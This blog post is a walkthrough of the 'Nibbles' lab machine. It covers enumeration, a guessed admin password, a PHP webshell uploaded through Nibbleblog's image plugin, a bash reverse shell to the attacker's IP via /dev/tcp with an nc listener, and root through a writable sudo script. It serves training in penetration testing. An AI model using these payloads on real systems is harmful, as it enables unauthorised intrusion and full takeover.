0xW1LD

Logo

Just some 0xW1LD stuff...

View My GitHub Profile

14 February 2025

Nibbles

by 0xW1LD

nibbles

Information Gathering

Enumeration

nmap found the following ports open:

1
2
3

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

A detailed script+service scan reveals the following information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

Running on port 80 is an http website running Apache httpd 2.4.18:
Pasted image 20250213170012.png
Viewing the page source reveals something interesting:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

<b>Hello world!</b>














<!-- /nibbleblog/ directory. Nothing interesting here! -->

Navigating to that directory we find the following homepage:
Pasted image 20250213170207.png A directory scan on the webroot found these directories:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.200.170/FUZZ
 :: Wordlist         : FUZZ: /opt/seclists/737/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htaccess               [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 290ms]
.hta                    [Status: 403, Size: 293, Words: 22, Lines: 12, Duration: 2518ms]
.htpasswd               [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 4711ms]
index.html              [Status: 200, Size: 93, Words: 8, Lines: 17, Duration: 305ms]
server-status           [Status: 403, Size: 302, Words: 22, Lines: 12, Duration: 287ms]
:: Progress: [4739/4739] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:43] :: Errors: 0 ::

Nothing quite so interesting as they’re all forbidden aside from index.html
A directory scan on the nibbleblog directory found:

1
2
3
4
5
6
7
8
9
10
11

/.hta                 (Status: 403) [Size: 304]
/.htpasswd            (Status: 403) [Size: 309]
/.htaccess            (Status: 403) [Size: 309]
/README               (Status: 200) [Size: 4628]
/admin                (Status: 301) [Size: 327] [--> http://10.129.200.170/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 331] [--> http://10.129.200.170/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/plugins/]
/themes               (Status: 301) [Size: 328] [--> http://10.129.200.170/nibbleblog/themes/]

We have found a login page: /nibbleblog/admin.php:
Pasted image 20250213175925.png Looking through the rest of the files we find users.xml which confirmed the username admin and some sort of blacklist which occurs when more than 5 incorrect login attempts are made:
Pasted image 20250214173423.png Another file is README which contains the nibbleblog version: v4.0.3 Attempting to login guessing nibbles as the password works! After loging in we reach an admin dashboard:
Pasted image 20250213180044.png Viewing the plugins we find a my image plugin, which on initial testing is vulnerable to an arbitrary file upload.

Exploitation

The following exploit seems to be present on the enumerated version (v4.0.3). Uploading the following PoC using the my image plugin:

1

<?php system($_GET['cmd'])?>

Leads to the following errors being shown:

1
2
3
4
5
6
7
8
9
10
11

Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26

Warning: imagesy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 27

Warning: imagecreatetruecolor(): Invalid image dimensions in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 117

Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 118

Warning: imagejpeg() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 43

Warning: imagedestroy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 80

Ignoring these and checking back on the homepage of the blog we can see the image title and caption for the image we uploaded:
Pasted image 20250213181150.png opening the image in a new tab redirects to the following directory:

1

http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.jpg

if we replace .jpg with .php?cmd=id we get the following response:

1

uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

Success! we have a WebShell! Uploading the following PoC:

1

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.87/9001 0>&1'")?>

Starting a listener:

1

nc -lvnp 9001

And then browsing to the shell location:

1

http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php

Leads to a RevShell!:

1
2
3
4
5
6

nc -lvnp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.200.170 34030
bash: cannot set terminal process group (1257): Inappropriate ioctl for device
bash: no job control in this shell
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$

Post Exploitation

Looking around in our shell we find that we can run the following sudo command with no password:

1
2

sudo -l
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Seeing as we have write permissions in the home directory:

1
2
3
4
5
6
7
8
9

ls -la
total 24
drwxr-xr-x 4 nibbler nibbler 4096 Feb 14 01:11 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
drwxr-xr-x 3 nibbler nibbler 4096 Feb 14 01:11 personal
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Mar 12  2021 user.txt

We can create a file called monitor.sh in ~/personal/stuff with the following contents:

1
2

#!/bin/bash
bash

We then set the file to be executable:

1

chmod +x monitor.sh

and when we execute it as sudo we get a root shell!:

1
2

sudo ./monitor.sh
root@Nibbles:/home/nibbler/personal/stuff#
tags: diff/easy - os/linux